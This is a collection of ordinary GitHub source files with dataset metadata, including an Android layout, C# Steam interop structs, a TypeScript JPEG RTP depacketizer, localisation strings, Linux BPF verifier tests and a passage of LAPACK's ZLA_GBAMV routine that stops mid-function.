text
stringlengths 2
100k
| meta
dict |
---|---|
<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
android:layout_width="match_parent"
android:layout_height="match_parent"
android:background="@color/layout_bg_color"
android:fitsSystemWindows="true"
android:orientation="vertical">
<include layout="@layout/layout_toolbar" />
<EditText
android:id="@+id/old_password_et"
android:layout_width="match_parent"
android:layout_height="44dp"
android:layout_marginTop="10dp"
android:background="@color/edit_text_bg_color"
android:hint="旧密码"
android:inputType="textPassword"
android:paddingStart="10dp"
android:paddingEnd="10dp"
android:singleLine="true"
android:textColor="@color/edit_text_text_color"
android:textColorHint="@color/edit_text_hint_color"
android:textSize="16sp" />
<EditText
android:id="@+id/new_password_et"
android:layout_width="match_parent"
android:layout_height="44dp"
android:layout_marginTop="1dp"
android:background="@color/edit_text_bg_color"
android:hint="新密码"
android:inputType="textPassword"
android:paddingStart="10dp"
android:paddingEnd="10dp"
android:singleLine="true"
android:textColor="@color/edit_text_text_color"
android:textColorHint="@color/edit_text_hint_color"
android:textSize="16sp" />
<Button
android:id="@+id/reset_bt"
android:layout_width="match_parent"
android:layout_height="40dp"
android:layout_marginStart="20dp"
android:layout_marginTop="20dp"
android:layout_marginEnd="20dp"
android:background="@drawable/btn_corner_blue"
android:text="修改"
android:textColor="@color/theme_button_text_color"
android:textSize="16sp" />
</LinearLayout> | {
"pile_set_name": "Github"
} |
// This file is automatically generated.
using System;
using System.Text;
using System.Runtime.InteropServices;
namespace Steam4NET
{
[StructLayout(LayoutKind.Sequential,Pack=8)]
[InteropHelp.CallbackIdentity(2301)]
public struct ScreenshotReady_t
{
public const int k_iCallback = 2301;
public UInt32 m_hLocal;
public EResult m_eResult;
};
[StructLayout(LayoutKind.Sequential,Pack=8)]
[InteropHelp.CallbackIdentity(2302)]
public struct ScreenshotRequested_t
{
public const int k_iCallback = 2302;
};
[StructLayout(LayoutKind.Sequential,Pack=8)]
[InteropHelp.CallbackIdentity(2201)]
public struct ScreenshotUploadProgress_t
{
public const int k_iCallback = 2201;
public double m_dPercentScreenshot;
public double m_dPercentBatch;
public Int32 m_nFailed;
};
[StructLayout(LayoutKind.Sequential,Pack=8)]
[InteropHelp.CallbackIdentity(2202)]
public struct ScreenshotWritten_t
{
public const int k_iCallback = 2202;
public UInt32 m_hLocal;
public GameID_t m_gameID;
public UInt32 m_timeCreated;
public UInt32 m_nWidth;
public UInt32 m_nHeight;
};
[StructLayout(LayoutKind.Sequential,Pack=8)]
[InteropHelp.CallbackIdentity(2203)]
public struct ScreenshotUploaded_t
{
public const int k_iCallback = 2203;
public UInt32 m_hLocal;
public GameID_t m_gameID;
public UInt64 m_hFile;
public UInt32 m_timeCreated;
public UInt32 m_nWidth;
public UInt32 m_nHeight;
public EUCMFilePrivacyState m_ePrivacy;
[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 540)]
public string m_pchCaption;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 28)]
public Byte[] pubUnknownData;
};
[StructLayout(LayoutKind.Sequential,Pack=8)]
[InteropHelp.CallbackIdentity(2204)]
public struct ScreenshotBatchComplete_t
{
public const int k_iCallback = 2204;
public Int32 m_nAttempted;
public Int32 m_nResultsOK;
};
[StructLayout(LayoutKind.Sequential,Pack=8)]
[InteropHelp.CallbackIdentity(2205)]
public struct ScreenshotDeleted_t
{
public const int k_iCallback = 2205;
public EResult m_eResult;
public UInt32 m_hLocal;
public GameID_t m_gameID;
};
[StructLayout(LayoutKind.Sequential,Pack=8)]
[InteropHelp.CallbackIdentity(2206)]
public struct ScreenshotTriggered_t
{
public const int k_iCallback = 2206;
public GameID_t m_gameID;
};
}
| {
"pile_set_name": "Github"
} |
sbt.version=1.1.0
| {
"pile_set_name": "Github"
} |
/**
* Brazilian translation for bootstrap-datepicker
* Cauan Cabral <[email protected]>
*/
;(function($){
$.fn.datepicker.dates['pt-BR'] = {
days: ["Domingo", "Segunda", "Terça", "Quarta", "Quinta", "Sexta", "Sábado", "Domingo"],
daysShort: ["Dom", "Seg", "Ter", "Qua", "Qui", "Sex", "Sáb", "Dom"],
daysMin: ["Do", "Se", "Te", "Qu", "Qu", "Se", "Sa", "Do"],
months: ["Janeiro", "Fevereiro", "Março", "Abril", "Maio", "Junho", "Julho", "Agosto", "Setembro", "Outubro", "Novembro", "Dezembro"],
monthsShort: ["Jan", "Fev", "Mar", "Abr", "Mai", "Jun", "Jul", "Ago", "Set", "Out", "Nov", "Dez"],
today: "Hoje"
};
}(jQuery));
| {
"pile_set_name": "Github"
} |
import { Tube } from '../component'
import { MessageType, Message } from '../message'
import { VideoMedia } from '../../utils/protocols/sdp'
import { jpegDepayFactory } from './parser'
import { Transform } from 'stream'
import { payloadType, timestamp, marker } from '../../utils/protocols/rtp'
export class JPEGDepay extends Tube {
constructor() {
let jpegPayloadType: number
let packets: Buffer[] = []
let jpegDepay: (
packets: Buffer[],
) => { size: { width: number; height: number }; data: Buffer }
const incoming = new Transform({
objectMode: true,
transform: function (msg: Message, encoding, callback) {
if (msg.type === MessageType.SDP) {
const jpegMedia = msg.sdp.media.find((media): media is VideoMedia => {
return (
media.type === 'video' &&
media.rtpmap !== undefined &&
media.rtpmap.encodingName === 'JPEG'
)
})
if (jpegMedia !== undefined && jpegMedia.rtpmap !== undefined) {
jpegPayloadType = Number(jpegMedia.rtpmap.payloadType)
const framesize = jpegMedia.framesize
// `framesize` is an SDP field that is present in e.g. Axis camera's
// and is used because the width and height that can be sent inside
// the JPEG header are both limited to 2040.
// If present, we use this width and height as the default values
// to be used by the jpeg depay function, otherwise we ignore this
// and let the JPEG header inside the RTP packets determine this.
if (framesize !== undefined) {
const [width, height] = framesize
// msg.framesize = { width, height }
jpegDepay = jpegDepayFactory(width, height)
} else {
jpegDepay = jpegDepayFactory()
}
}
callback(undefined, msg)
} else if (
msg.type === MessageType.RTP &&
payloadType(msg.data) === jpegPayloadType
) {
packets.push(msg.data)
// JPEG over RTP uses the RTP marker bit to indicate end
// of fragmentation. At this point, the packets can be used
// to reconstruct a JPEG frame.
if (marker(msg.data) && packets.length > 0) {
const jpegFrame = jpegDepay(packets)
this.push({
timestamp: timestamp(msg.data),
ntpTimestamp: msg.ntpTimestamp,
payloadType: payloadType(msg.data),
data: jpegFrame.data,
framesize: jpegFrame.size,
type: MessageType.JPEG,
})
packets = []
}
callback()
} else {
// Not a message we should handle
callback(undefined, msg)
}
},
})
// outgoing will be defaulted to a PassThrough stream
super(incoming)
}
}
| {
"pile_set_name": "Github"
} |
'Based on GeoNames.org and OpenStreetMap.org data': 'Basierend auf Daten von Geonames.org und OpenStreetMap.org'
'selected marker icon': 'ausgewähltes Markierungssymbol'
'add location to map': 'Ort der Karte hinzufügen'
'Video source': Videoquelle
'The point will be removed from all translations of the article.': 'Der Standort wird aus allen Übersetzungen des Artikels entfernt. '
'Specify country (optional)': 'Land festlegen (optional)'
'Sorry, that place was not found. Check your spelling or search again.': 'Der Ort wurde nicht gefunden. Überprüfen Sie die Schreibweise oder suchen Sie erneut. '
'Show search results': 'Suchergebnisse anzeigen'
'Search for place or coordinate': 'Nach Ort oder Koordinaten suchen'
'Return to edit': 'Zur Bearbeitung zurückkehren'
'Really delete this point?': 'Diesen Standort wirklich löschen?'
'Name and describe this location': 'Benennen und beschreiben Sie diesen Ort'
'Map size': Kartengröße
'Location label': Ortsbezeichnung
'Location description:': 'Ortsbeschreibung: '
'Label url': 'Bezeichnung url'
'Hide search results': 'Suchergebnisse verbergen'
Geo-filtering: Geofilter
'Fill in youtube ID or link, e.g.': 'Bitte Youtube-ID oder Link eingeben, z.B. '
'Fill in vimeo ID or link, e.g': 'Bitte Vimeo-ID oder Link eingeben, z.B. '
'Fill in video ID, link or file name, for YouTube, Vimeo, or flash video.': 'Bitte Video-ID, Link oder Dateinamen für YouTube, Vimeo oder Flash-Video eingeben. '
'Fill in location label': 'Bitte Ortsbezeichnung eingeben'
'Fill in local swf flash file name or link, e.g.': 'Bitte geben Sie den Namen der lokalen Flash-Datein oder den Link ein, z.B. '
'Fill in local flv flash file name or link, e.g.': 'Bitte geben Sie den Namen oder den Link zur lokalen Flash-Datei ein, z.B. '
'Fill in image link, like': 'Bitte Bildlink eingeben, wie '
'Describe the location...': 'Beschreiben Sie den Ort...'
'Delete location': 'Ort löschen'
Coordinates: Koordinaten
'Change video display size': 'Anzeigegröße des Videos ändern'
'Change image display size': 'Anzeigegröße des Bildes ändern'
'Change icon of this location': 'Symbol zum Ort ändern'
'Center map on location': 'Karte zum Ort zentrieren'
'Advanced editing': 'Erweiterte Bearbeitung'
'Add an image to this location': 'Diesem Ort ein Bild hinzufügen'
'Add a video to this location': 'Diesem Ort ein Video hinzufügen'
'Are you sure you want to quit without saving your changes?': 'Wirklich verlassen ohne Änderungen zu speichern?'
'Map preview': 'Vorschau Karte'
'Locations updated.': 'Standorte aktualisiert.'
'Setting the map name helps with map search': 'Einen Kartennamen festlegen um die Kartensuche zu vereinfachen.'
Longitude: Längengrad
Latitude: Breitengrad
Center: Zentrieren
'Last Saved Map View': 'Zuletzt gespeicherte Kartenansicht'
'List of locations updated': 'Liste der Standorte aktualisiert'
width: Breite
'show initial map view': 'Erste Kartenansicht anzeigen'
'problem at point processing, please send error report': 'Problem beim Bearbeiten der Standpunkte, bitte Fehlermeldung senden.'
'plain text': 'Einfacher Text '
'html content': 'HTML Inhalt'
height: Höhe
'fill in map name': 'Kartenname eintragen'
'You do not have the right to remove maps from articles.': 'Keine Berechtigung um Karten aus Artikeln zu entfernen'
'Video file': Videodatei
'Video ID': 'Video ID'
'The map has been removed from the article.': 'Die Karte wurde aus dem Artikel entfernt.'
'Point no.': Standpunktnummer
'Point markers': Standpunktmarkierungen
None: Keine
'Map Search Example': 'Kartensuche Beispiel'
'Map Preview': Kartenvorschau
'Image URL': 'Bild URL'
video: 'Video '
text: Text
image: Bild
icon: Symbol
'Setting Map Locations': 'Kartenstandorte festlegen'
Deselect: 'Auswahl zurücknehmen'
| {
"pile_set_name": "Github"
} |
/**
* @author Martin Micunda {@link http://martinmicunda.com}
* @copyright Copyright (c) 2015, Martin Micunda
* @license GPL-3.0
*/
'use strict';
import {RouteConfig} from '../../../../../ng-decorators'; // jshint unused: false
//start-non-standard
@RouteConfig('app.employees.add.contact-details', {
url: '/contact-details',
views: {
'modal@': {
template: '<employee-contact-details></employee-contact-details>'
}
}
})
//end-non-standard
class EmployeeAddContactDetails {}
| {
"pile_set_name": "Github"
} |
/*
* Backpack - Skyscanner's Design System
*
* Copyright 2016-2020 Skyscanner Ltd
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/* @flow strict */
import PropTypes from 'prop-types';
import React, { type Node } from 'react';
import { cssModules } from 'bpk-react-utils';
import STYLES from './BpkTable.scss';
const getClassName = cssModules(STYLES);
type Props = {
children: Node,
className: ?string,
};
const BpkTableCell = (props: Props) => {
const { className, ...rest } = props;
const classNames = getClassName('bpk-table__cell', className);
return (
// $FlowFixMe[cannot-spread-inexact] - inexact rest. See decisions/flowfixme.md
<td className={classNames} {...rest}>
{props.children}
</td>
);
};
BpkTableCell.propTypes = {
className: PropTypes.string,
children: PropTypes.node.isRequired,
};
BpkTableCell.defaultProps = {
className: null,
};
export default BpkTableCell;
| {
"pile_set_name": "Github"
} |
{
"ld_abs: check calling conv, r1",
.insns = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_MOV64_IMM(BPF_REG_1, 0),
BPF_LD_ABS(BPF_W, -0x200000),
BPF_MOV64_REG(BPF_REG_0, BPF_REG_1),
BPF_EXIT_INSN(),
},
.errstr = "R1 !read_ok",
.result = REJECT,
},
{
"ld_abs: check calling conv, r2",
.insns = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_MOV64_IMM(BPF_REG_2, 0),
BPF_LD_ABS(BPF_W, -0x200000),
BPF_MOV64_REG(BPF_REG_0, BPF_REG_2),
BPF_EXIT_INSN(),
},
.errstr = "R2 !read_ok",
.result = REJECT,
},
{
"ld_abs: check calling conv, r3",
.insns = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_MOV64_IMM(BPF_REG_3, 0),
BPF_LD_ABS(BPF_W, -0x200000),
BPF_MOV64_REG(BPF_REG_0, BPF_REG_3),
BPF_EXIT_INSN(),
},
.errstr = "R3 !read_ok",
.result = REJECT,
},
{
"ld_abs: check calling conv, r4",
.insns = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_MOV64_IMM(BPF_REG_4, 0),
BPF_LD_ABS(BPF_W, -0x200000),
BPF_MOV64_REG(BPF_REG_0, BPF_REG_4),
BPF_EXIT_INSN(),
},
.errstr = "R4 !read_ok",
.result = REJECT,
},
{
"ld_abs: check calling conv, r5",
.insns = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_MOV64_IMM(BPF_REG_5, 0),
BPF_LD_ABS(BPF_W, -0x200000),
BPF_MOV64_REG(BPF_REG_0, BPF_REG_5),
BPF_EXIT_INSN(),
},
.errstr = "R5 !read_ok",
.result = REJECT,
},
{
"ld_abs: check calling conv, r7",
.insns = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_MOV64_IMM(BPF_REG_7, 0),
BPF_LD_ABS(BPF_W, -0x200000),
BPF_MOV64_REG(BPF_REG_0, BPF_REG_7),
BPF_EXIT_INSN(),
},
.result = ACCEPT,
},
{
"ld_abs: tests on r6 and skb data reload helper",
.insns = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_LD_ABS(BPF_B, 0),
BPF_LD_ABS(BPF_H, 0),
BPF_LD_ABS(BPF_W, 0),
BPF_MOV64_REG(BPF_REG_7, BPF_REG_6),
BPF_MOV64_IMM(BPF_REG_6, 0),
BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),
BPF_MOV64_IMM(BPF_REG_2, 1),
BPF_MOV64_IMM(BPF_REG_3, 2),
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_skb_vlan_push),
BPF_MOV64_REG(BPF_REG_6, BPF_REG_7),
BPF_LD_ABS(BPF_B, 0),
BPF_LD_ABS(BPF_H, 0),
BPF_LD_ABS(BPF_W, 0),
BPF_MOV64_IMM(BPF_REG_0, 42),
BPF_EXIT_INSN(),
},
.prog_type = BPF_PROG_TYPE_SCHED_CLS,
.result = ACCEPT,
.retval = 42 /* ultimate return value */,
},
{
"ld_abs: invalid op 1",
.insns = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_LD_ABS(BPF_DW, 0),
BPF_EXIT_INSN(),
},
.prog_type = BPF_PROG_TYPE_SCHED_CLS,
.result = REJECT,
.errstr = "unknown opcode",
},
{
"ld_abs: invalid op 2",
.insns = {
BPF_MOV32_IMM(BPF_REG_0, 256),
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_LD_IND(BPF_DW, BPF_REG_0, 0),
BPF_EXIT_INSN(),
},
.prog_type = BPF_PROG_TYPE_SCHED_CLS,
.result = REJECT,
.errstr = "unknown opcode",
},
{
"ld_abs: nmap reduced",
.insns = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_LD_ABS(BPF_H, 12),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0x806, 28),
BPF_LD_ABS(BPF_H, 12),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0x806, 26),
BPF_MOV32_IMM(BPF_REG_0, 18),
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -64),
BPF_LDX_MEM(BPF_W, BPF_REG_7, BPF_REG_10, -64),
BPF_LD_IND(BPF_W, BPF_REG_7, 14),
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -60),
BPF_MOV32_IMM(BPF_REG_0, 280971478),
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -56),
BPF_LDX_MEM(BPF_W, BPF_REG_7, BPF_REG_10, -56),
BPF_LDX_MEM(BPF_W, BPF_REG_0, BPF_REG_10, -60),
BPF_ALU32_REG(BPF_SUB, BPF_REG_0, BPF_REG_7),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 15),
BPF_LD_ABS(BPF_H, 12),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0x806, 13),
BPF_MOV32_IMM(BPF_REG_0, 22),
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -56),
BPF_LDX_MEM(BPF_W, BPF_REG_7, BPF_REG_10, -56),
BPF_LD_IND(BPF_H, BPF_REG_7, 14),
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -52),
BPF_MOV32_IMM(BPF_REG_0, 17366),
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -48),
BPF_LDX_MEM(BPF_W, BPF_REG_7, BPF_REG_10, -48),
BPF_LDX_MEM(BPF_W, BPF_REG_0, BPF_REG_10, -52),
BPF_ALU32_REG(BPF_SUB, BPF_REG_0, BPF_REG_7),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
BPF_MOV32_IMM(BPF_REG_0, 256),
BPF_EXIT_INSN(),
BPF_MOV32_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN(),
},
.data = {
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0x08, 0x06, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0x10, 0xbf, 0x48, 0xd6, 0x43, 0xd6,
},
.prog_type = BPF_PROG_TYPE_SCHED_CLS,
.result = ACCEPT,
.retval = 256,
},
{
"ld_abs: div + abs, test 1",
.insns = {
BPF_ALU64_REG(BPF_MOV, BPF_REG_6, BPF_REG_1),
BPF_LD_ABS(BPF_B, 3),
BPF_ALU64_IMM(BPF_MOV, BPF_REG_2, 2),
BPF_ALU32_REG(BPF_DIV, BPF_REG_0, BPF_REG_2),
BPF_ALU64_REG(BPF_MOV, BPF_REG_8, BPF_REG_0),
BPF_LD_ABS(BPF_B, 4),
BPF_ALU64_REG(BPF_ADD, BPF_REG_8, BPF_REG_0),
BPF_LD_IND(BPF_B, BPF_REG_8, -70),
BPF_EXIT_INSN(),
},
.data = {
10, 20, 30, 40, 50,
},
.prog_type = BPF_PROG_TYPE_SCHED_CLS,
.result = ACCEPT,
.retval = 10,
},
{
"ld_abs: div + abs, test 2",
.insns = {
BPF_ALU64_REG(BPF_MOV, BPF_REG_6, BPF_REG_1),
BPF_LD_ABS(BPF_B, 3),
BPF_ALU64_IMM(BPF_MOV, BPF_REG_2, 2),
BPF_ALU32_REG(BPF_DIV, BPF_REG_0, BPF_REG_2),
BPF_ALU64_REG(BPF_MOV, BPF_REG_8, BPF_REG_0),
BPF_LD_ABS(BPF_B, 128),
BPF_ALU64_REG(BPF_ADD, BPF_REG_8, BPF_REG_0),
BPF_LD_IND(BPF_B, BPF_REG_8, -70),
BPF_EXIT_INSN(),
},
.data = {
10, 20, 30, 40, 50,
},
.prog_type = BPF_PROG_TYPE_SCHED_CLS,
.result = ACCEPT,
.retval = 0,
},
{
"ld_abs: div + abs, test 3",
.insns = {
BPF_ALU64_REG(BPF_MOV, BPF_REG_6, BPF_REG_1),
BPF_ALU64_IMM(BPF_MOV, BPF_REG_7, 0),
BPF_LD_ABS(BPF_B, 3),
BPF_ALU32_REG(BPF_DIV, BPF_REG_0, BPF_REG_7),
BPF_EXIT_INSN(),
},
.data = {
10, 20, 30, 40, 50,
},
.prog_type = BPF_PROG_TYPE_SCHED_CLS,
.result = ACCEPT,
.retval = 0,
},
{
"ld_abs: div + abs, test 4",
.insns = {
BPF_ALU64_REG(BPF_MOV, BPF_REG_6, BPF_REG_1),
BPF_ALU64_IMM(BPF_MOV, BPF_REG_7, 0),
BPF_LD_ABS(BPF_B, 256),
BPF_ALU32_REG(BPF_DIV, BPF_REG_0, BPF_REG_7),
BPF_EXIT_INSN(),
},
.data = {
10, 20, 30, 40, 50,
},
.prog_type = BPF_PROG_TYPE_SCHED_CLS,
.result = ACCEPT,
.retval = 0,
},
{
"ld_abs: vlan + abs, test 1",
.insns = { },
.data = {
0x34,
},
.fill_helper = bpf_fill_ld_abs_vlan_push_pop,
.prog_type = BPF_PROG_TYPE_SCHED_CLS,
.result = ACCEPT,
.retval = 0xbef,
},
{
"ld_abs: vlan + abs, test 2",
.insns = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_LD_ABS(BPF_B, 0),
BPF_LD_ABS(BPF_H, 0),
BPF_LD_ABS(BPF_W, 0),
BPF_MOV64_REG(BPF_REG_7, BPF_REG_6),
BPF_MOV64_IMM(BPF_REG_6, 0),
BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),
BPF_MOV64_IMM(BPF_REG_2, 1),
BPF_MOV64_IMM(BPF_REG_3, 2),
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0,
BPF_FUNC_skb_vlan_push),
BPF_MOV64_REG(BPF_REG_6, BPF_REG_7),
BPF_LD_ABS(BPF_B, 0),
BPF_LD_ABS(BPF_H, 0),
BPF_LD_ABS(BPF_W, 0),
BPF_MOV64_IMM(BPF_REG_0, 42),
BPF_EXIT_INSN(),
},
.data = {
0x34,
},
.prog_type = BPF_PROG_TYPE_SCHED_CLS,
.result = ACCEPT,
.retval = 42,
},
{
"ld_abs: jump around ld_abs",
.insns = { },
.data = {
10, 11,
},
.fill_helper = bpf_fill_jump_around_ld_abs,
.prog_type = BPF_PROG_TYPE_SCHED_CLS,
.result = ACCEPT,
.retval = 10,
},
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="JavaScriptLibraryMappings">
<includedPredefinedLibrary name="ECMAScript 6" />
</component>
</project> | {
"pile_set_name": "Github"
} |
import {onetomany, manytoone, manytomany} from '../core/decorators';
import {column, entity} from '../sequelizeimp/decorators';
import {Strict} from '../sequelizeimp/enums';
import * as Sequelize from "sequelize";
import {BlogSqlModel} from "./blogSqlModel"
@entity({ name:'tbl_blog_post2', tableName: 'tbl_blog_post2',timestamps:false })
export class BlogPostSqlModel {
@column({name:"id", type: Sequelize.INTEGER, autoIncrement:true, allowNull:false, primaryKey: true })
_id: number;
@column({ name: "name", type: Sequelize.STRING(128), defaultValue:"defaultBlog" })
name: string;
@manytoone({ rel: 'tbl_blog2', itemType: BlogSqlModel, embedded: false, persist: true, eagerLoading: true })
blog: BlogSqlModel;
}
export default BlogPostSqlModel; | {
"pile_set_name": "Github"
} |
*> \brief \b ZLA_GBAMV performs a matrix-vector operation to calculate error bounds.
*
* =========== DOCUMENTATION ===========
*
* Online html documentation available at
* http://www.netlib.org/lapack/explore-html/
*
*> \htmlonly
*> Download ZLA_GBAMV + dependencies
*> <a href="http://www.netlib.org/cgi-bin/netlibfiles.tgz?format=tgz&filename=/lapack/lapack_routine/zla_gbamv.f">
*> [TGZ]</a>
*> <a href="http://www.netlib.org/cgi-bin/netlibfiles.zip?format=zip&filename=/lapack/lapack_routine/zla_gbamv.f">
*> [ZIP]</a>
*> <a href="http://www.netlib.org/cgi-bin/netlibfiles.txt?format=txt&filename=/lapack/lapack_routine/zla_gbamv.f">
*> [TXT]</a>
*> \endhtmlonly
*
* Definition:
* ===========
*
* SUBROUTINE ZLA_GBAMV( TRANS, M, N, KL, KU, ALPHA, AB, LDAB, X,
* INCX, BETA, Y, INCY )
*
* .. Scalar Arguments ..
* DOUBLE PRECISION ALPHA, BETA
* INTEGER INCX, INCY, LDAB, M, N, KL, KU, TRANS
* ..
* .. Array Arguments ..
* COMPLEX*16 AB( LDAB, * ), X( * )
* DOUBLE PRECISION Y( * )
* ..
*
*
*> \par Purpose:
* =============
*>
*> \verbatim
*>
*> ZLA_GBAMV performs one of the matrix-vector operations
*>
*> y := alpha*abs(A)*abs(x) + beta*abs(y),
*> or y := alpha*abs(A)**T*abs(x) + beta*abs(y),
*>
*> where alpha and beta are scalars, x and y are vectors and A is an
*> m by n matrix.
*>
*> This function is primarily used in calculating error bounds.
*> To protect against underflow during evaluation, components in
*> the resulting vector are perturbed away from zero by (N+1)
*> times the underflow threshold. To prevent unnecessarily large
*> errors for block-structure embedded in general matrices,
*> "symbolically" zero components are not perturbed. A zero
*> entry is considered "symbolic" if all multiplications involved
*> in computing that entry have at least one zero multiplicand.
*> \endverbatim
*
* Arguments:
* ==========
*
*> \param[in] TRANS
*> \verbatim
*> TRANS is INTEGER
*> On entry, TRANS specifies the operation to be performed as
*> follows:
*>
*> BLAS_NO_TRANS y := alpha*abs(A)*abs(x) + beta*abs(y)
*> BLAS_TRANS y := alpha*abs(A**T)*abs(x) + beta*abs(y)
*> BLAS_CONJ_TRANS y := alpha*abs(A**T)*abs(x) + beta*abs(y)
*>
*> Unchanged on exit.
*> \endverbatim
*>
*> \param[in] M
*> \verbatim
*> M is INTEGER
*> On entry, M specifies the number of rows of the matrix A.
*> M must be at least zero.
*> Unchanged on exit.
*> \endverbatim
*>
*> \param[in] N
*> \verbatim
*> N is INTEGER
*> On entry, N specifies the number of columns of the matrix A.
*> N must be at least zero.
*> Unchanged on exit.
*> \endverbatim
*>
*> \param[in] KL
*> \verbatim
*> KL is INTEGER
*> The number of subdiagonals within the band of A. KL >= 0.
*> \endverbatim
*>
*> \param[in] KU
*> \verbatim
*> KU is INTEGER
*> The number of superdiagonals within the band of A. KU >= 0.
*> \endverbatim
*>
*> \param[in] ALPHA
*> \verbatim
*> ALPHA is DOUBLE PRECISION
*> On entry, ALPHA specifies the scalar alpha.
*> Unchanged on exit.
*> \endverbatim
*>
*> \param[in] AB
*> \verbatim
*> AB is COMPLEX*16 array, dimension ( LDAB, n )
*> Before entry, the leading m by n part of the array AB must
*> contain the matrix of coefficients.
*> Unchanged on exit.
*> \endverbatim
*>
*> \param[in] LDAB
*> \verbatim
*> LDAB is INTEGER
*> On entry, LDAB specifies the first dimension of AB as declared
*> in the calling (sub) program. LDAB must be at least
*> max( 1, m ).
*> Unchanged on exit.
*> \endverbatim
*>
*> \param[in] X
*> \verbatim
*> X is COMPLEX*16 array, dimension
*> ( 1 + ( n - 1 )*abs( INCX ) ) when TRANS = 'N' or 'n'
*> and at least
*> ( 1 + ( m - 1 )*abs( INCX ) ) otherwise.
*> Before entry, the incremented array X must contain the
*> vector x.
*> Unchanged on exit.
*> \endverbatim
*>
*> \param[in] INCX
*> \verbatim
*> INCX is INTEGER
*> On entry, INCX specifies the increment for the elements of
*> X. INCX must not be zero.
*> Unchanged on exit.
*> \endverbatim
*>
*> \param[in] BETA
*> \verbatim
*> BETA is DOUBLE PRECISION
*> On entry, BETA specifies the scalar beta. When BETA is
*> supplied as zero then Y need not be set on input.
*> Unchanged on exit.
*> \endverbatim
*>
*> \param[in,out] Y
*> \verbatim
*> Y is DOUBLE PRECISION array, dimension
*> ( 1 + ( m - 1 )*abs( INCY ) ) when TRANS = 'N' or 'n'
*> and at least
*> ( 1 + ( n - 1 )*abs( INCY ) ) otherwise.
*> Before entry with BETA non-zero, the incremented array Y
*> must contain the vector y. On exit, Y is overwritten by the
*> updated vector y.
*> \endverbatim
*>
*> \param[in] INCY
*> \verbatim
*> INCY is INTEGER
*> On entry, INCY specifies the increment for the elements of
*> Y. INCY must not be zero.
*> Unchanged on exit.
*>
*> Level 2 Blas routine.
*> \endverbatim
*
* Authors:
* ========
*
*> \author Univ. of Tennessee
*> \author Univ. of California Berkeley
*> \author Univ. of Colorado Denver
*> \author NAG Ltd.
*
*> \date June 2017
*
*> \ingroup complex16GBcomputational
*
* =====================================================================
SUBROUTINE ZLA_GBAMV( TRANS, M, N, KL, KU, ALPHA, AB, LDAB, X,
$ INCX, BETA, Y, INCY )
*
* -- LAPACK computational routine (version 3.7.1) --
* -- LAPACK is a software package provided by Univ. of Tennessee, --
* -- Univ. of California Berkeley, Univ. of Colorado Denver and NAG Ltd..--
* June 2017
*
* .. Scalar Arguments ..
DOUBLE PRECISION ALPHA, BETA
INTEGER INCX, INCY, LDAB, M, N, KL, KU, TRANS
* ..
* .. Array Arguments ..
COMPLEX*16 AB( LDAB, * ), X( * )
DOUBLE PRECISION Y( * )
* ..
*
* =====================================================================
*
* .. Parameters ..
COMPLEX*16 ONE, ZERO
PARAMETER ( ONE = 1.0D+0, ZERO = 0.0D+0 )
* ..
* .. Local Scalars ..
LOGICAL SYMB_ZERO
DOUBLE PRECISION TEMP, SAFE1
INTEGER I, INFO, IY, J, JX, KX, KY, LENX, LENY, KD, KE
COMPLEX*16 CDUM
* ..
* .. External Subroutines ..
EXTERNAL XERBLA, DLAMCH
DOUBLE PRECISION DLAMCH
* ..
* .. External Functions ..
EXTERNAL ILATRANS
INTEGER ILATRANS
* ..
* .. Intrinsic Functions ..
INTRINSIC MAX, ABS, REAL, DIMAG, SIGN
* ..
* .. Statement Functions
DOUBLE PRECISION CABS1
* ..
* .. Statement Function Definitions ..
CABS1( CDUM ) = ABS( DBLE( CDUM ) ) + ABS( DIMAG( CDUM ) )
* ..
* .. Executable Statements ..
*
* Test the input parameters.
*
INFO = 0
IF ( .NOT.( ( TRANS.EQ.ILATRANS( 'N' ) )
$ .OR. ( TRANS.EQ.ILATRANS( 'T' ) )
$ .OR. ( TRANS.EQ.ILATRANS( 'C' ) ) ) ) THEN
INFO = 1
